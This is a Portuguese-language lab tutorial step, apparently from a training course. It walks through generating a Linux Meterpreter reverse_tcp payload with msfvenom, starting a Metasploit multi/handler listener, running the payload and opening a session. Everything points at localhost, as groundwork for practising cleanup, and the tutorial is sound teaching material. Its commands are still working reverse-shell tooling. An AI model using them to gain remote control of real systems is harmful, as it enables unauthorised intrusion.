Obter uma sessão Meterpreter em um alvo
Nesta etapa, antes de podermos praticar a limpeza de um sistema, primeiro precisamos obter acesso a ele. Simularemos isso criando um payload com msfvenom, configurando um listener no Metasploit Framework e, em seguida, "executando" o payload em nossa própria máquina para obter uma sessão Meterpreter em localhost.
Primeiro, abra um terminal e use msfvenom para gerar um payload Meterpreter para Linux. Este comando criará um arquivo executável chamado payload.elf em seu diretório atual (~/project).
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Você deverá ver uma saída indicando que o payload foi gerado com sucesso:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
Em seguida, inicie o console do Metasploit Framework. O flag -q faz com que ele inicie silenciosamente, sem exibir o banner.
msfconsole -q
Assim que estiver no prompt do msfconsole, você precisará configurar um listener para capturar a conexão do payload. Usaremos o módulo exploit/multi/handler.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
O comando exploit -j inicia o listener como um job em segundo plano, para que você ainda possa usar o console. Você verá uma mensagem indicando que o handler foi iniciado.
Agora, abra uma nova aba de terminal clicando no ícone + na janela do terminal. Nesta nova aba, torne o payload executável e execute-o.
chmod +x ~/project/payload.elf
~/project/payload.elf
Volte para a sua primeira aba de terminal com o msfconsole. Você deverá ver uma mensagem indicando que uma sessão Meterpreter foi aberta.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
Para interagir com esta nova sessão, use o comando sessions.
sessions -i 1
Seu prompt deverá mudar para meterpreter >, indicando que você agora está no controle da sessão.